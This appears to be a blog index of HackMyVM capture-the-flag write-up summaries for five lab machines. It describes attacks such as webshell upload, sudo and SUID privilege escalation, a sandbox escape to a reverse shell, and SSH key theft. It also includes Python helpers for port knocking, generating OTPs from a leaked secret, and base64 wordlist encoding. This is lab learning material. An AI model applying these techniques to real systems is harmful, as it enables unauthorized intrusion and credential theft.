HMV Five

This is a Linux machine with only the web service enabled. By controlling the directory parameter of the upload API endpoint we can upload a webshell to a location served by the web server, which gives us the initial foothold on the system.

We then discover a sudo rule that lets our initial user run /bin/cp as another user. SSH is listening on localhost only, but we can reach it by forwarding the port. We pivot to the second user by using the sudo-allowed /bin/cp to write our SSH public key into that user's authorized_keys, then logging in over the forwarded port. Finally, we obtain a root shell (or at least arbitrary file read) with a living-off-the-land (LOTL) technique; the binary involved is /bin/man.

[Read more]

HMV Alzheimer

This is a Linux machine with only the FTP service exposed at first. The SSH and web services open after port knocking with a sequence leaked through FTP. I then obtain the username from a secret on the web service and the password for that user from a hidden file on the FTP server; with these credentials I gain an initial foothold on the system.
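The port-knocking step above, as an added example that is not code from the original writeup. It assumes a classic knockd setup, where each knock is just an incoming SYN, so a plain TCP connect attempt that is refused or filtered still counts. The target address and the knock sequence in the main block are hypothetical placeholders; the real sequence came from the FTP leak.

```python
import socket
import time
from typing import Iterable, List


def knock(host: str, sequence: Iterable[int], delay: float = 0.2, timeout: float = 0.5) -> List[int]:
    """Send the knock sequence as ordinary TCP connection attempts.

    knockd (and most home-grown knockers) only watch for the incoming SYN,
    so a connect() that is refused or times out still registers as a knock.
    Returns the ports that were knocked, in order.
    """
    knocked = []
    for port in sequence:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:
            pass  # refused / filtered: the SYN was still sent
        finally:
            s.close()
        knocked.append(port)
        # the daemon matches the sequence in order; a small gap keeps it unambiguous
        time.sleep(delay)
    return knocked


def port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Check whether a port accepts connections, i.e. whether the knock opened it."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    # hypothetical target and sequence (assumptions, not values from the machine)
    TARGET = "192.168.56.101"
    SEQUENCE = [7000, 8000, 9000]
    print("ssh open before knock:", port_open(TARGET, 22))
    knock(TARGET, SEQUENCE)
    print("ssh open after knock:", port_open(TARGET, 22))
```

If the knock appears to do nothing, re-run the check a second later: knockd only rewrites the firewall after it sees the complete sequence, and some configurations close the port again after a timeout.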

I then find capsh with the SUID bit set, which can be abused to obtain a root shell.

[Read more]

HMV Hommie

This is a Linux machine with FTP, SSH, web and TFTP services enabled. We find the id_rsa of the user alexia by following hints on the web service's homepage, which gives us an initial foothold on the system.

We can then obtain root's id_rsa by exploiting a custom SUID program, which allows us to fully compromise the system.

[Read more]

HMV Learn2Code

This is a Linux machine with only the web service enabled. Using the Google Authenticator secret leaked in the source code, we can generate valid OTP codes ourselves and so reach a code execution environment. A little reconnaissance reveals it to be a Python sandbox that filters the import keyword; the filter can be bypassed with basic built-in operations, and we establish a foothold on the system through a reverse shell.
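Generating the OTP from a leaked Google Authenticator secret, as an added example that is not code from the original writeup. Google Authenticator secrets are base32-encoded keys used with RFC 6238 TOTP (HMAC-SHA1, 30-second step, 6 digits), so the standard library is enough. The secret in the main block is the RFC 6238 test key, not the one leaked on the machine; the `totp_window` helper is an addition for clock skew between attacker and target.

```python
import base64
import hashlib
import hmac
import struct
import time
from typing import List, Optional


def hotp(secret_b32: str, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter,
    dynamic truncation, then the last `digits` decimal digits."""
    # Google Authenticator shows the key as unpadded, sometimes spaced, base32;
    # normalise and restore the '=' padding that b32decode requires
    normalized = secret_b32.strip().replace(" ", "").upper()
    key = base64.b32decode(normalized + "=" * (-len(normalized) % 8))
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret_b32: str, at: Optional[int] = None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with counter = floor(unix_time / step)."""
    if at is None:
        at = int(time.time())
    return hotp(secret_b32, at // step, digits)


def totp_window(secret_b32: str, at: Optional[int] = None, skew: int = 1,
                step: int = 30, digits: int = 6) -> List[str]:
    """Codes for the current step and `skew` steps either side. Servers
    usually accept a small window, so trying the neighbours covers clock
    drift between us and the target."""
    if at is None:
        at = int(time.time())
    return [hotp(secret_b32, at // step + i, digits) for i in range(-skew, skew + 1)]


if __name__ == "__main__":
    # constructed example: the RFC 6238 test key "12345678901234567890" in base32,
    # not a secret from the machine
    LEAKED_SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"
    print("current code:", totp(LEAKED_SECRET))
    print("codes to try:", totp_window(LEAKED_SECRET))
```

The assertions that ship with this block check against the published RFC 4226/6238 test vectors, which is the quickest way to confirm an OTP implementation before pointing it at a target.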

We then identify a root-owned program with the SUID bit set. By exploiting a simple stack overflow to overwrite a variable, we pivot to a regular user account. In that user's home directory we find another custom executable; analysing it yields the root user's password.

[Read more]

HMV BaseMe

This is a Linux machine with SSH and web services enabled. The homepage hints strongly that base64 encoding is involved. After base64-encoding the wordlist used for web enumeration, we find a passphrase-protected SSH private key. Using John the Ripper with the password hint from the homepage (again base64-encoded), we quickly recover the passphrase and gain a foothold on the system.

We then discover that the sudo rules for the initial user allow running the base64 utility as root, which lets us read arbitrary files; reading the root user's SSH private key gives us full control of the system.
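Both base64 steps above (encoding the enumeration wordlist, and decoding what a sudo-run `base64 FILE` prints), as an added example that is not code from the original writeup. It goes slightly beyond the text by emitting the padding-stripped and URL-safe forms of each word too, since a path on a web server rarely keeps a trailing `=`. The sample wordlist and the sample key text are constructed inputs.

```python
import base64
from typing import Iterable, List


def base64_variants(word: str) -> List[str]:
    """Standard base64 of the word plus the forms a web server or a CTF
    author is likely to have used: without '=' padding, and URL-safe."""
    raw = word.encode()
    std = base64.b64encode(raw).decode()
    urlsafe = base64.urlsafe_b64encode(raw).decode()
    variants = [std, std.rstrip("="), urlsafe, urlsafe.rstrip("=")]
    # de-duplicate while keeping order: short words without '+' or '/' collapse
    seen, out = set(), []
    for v in variants:
        if v not in seen:
            seen.add(v)
            out.append(v)
    return out


def encode_wordlist(words: Iterable[str]) -> List[str]:
    """Turn a plain enumeration wordlist into its base64-encoded counterpart,
    skipping blank lines and '#' comments as common wordlists contain them."""
    out = []
    for w in words:
        w = w.strip()
        if not w or w.startswith("#"):
            continue
        out.extend(base64_variants(w))
    return out


def decode_cli_output(text: str) -> bytes:
    """Reverse what `base64 FILE` prints: the CLI wraps at 76 columns, so join
    the lines before decoding. Used on the output of `sudo base64 /path/to/file`."""
    return base64.b64decode("".join(text.split()))


if __name__ == "__main__":
    # constructed sample wordlist, not the list used on the machine
    sample = ["admin", "backup", "id_rsa", "# comment", ""]
    for line in encode_wordlist(sample):
        print(line)
    # constructed sample of wrapped base64 output; not a real key
    wrapped = base64.encodebytes(
        b"-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed sample, not a real key\n"
    ).decode()
    print(decode_cli_output(wrapped).decode())
```

Write the encoded list to a file and feed it to the same directory brute-forcer used for the plain wordlist; a recovered key still needs `chmod 600` before ssh will accept it.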

[Read more]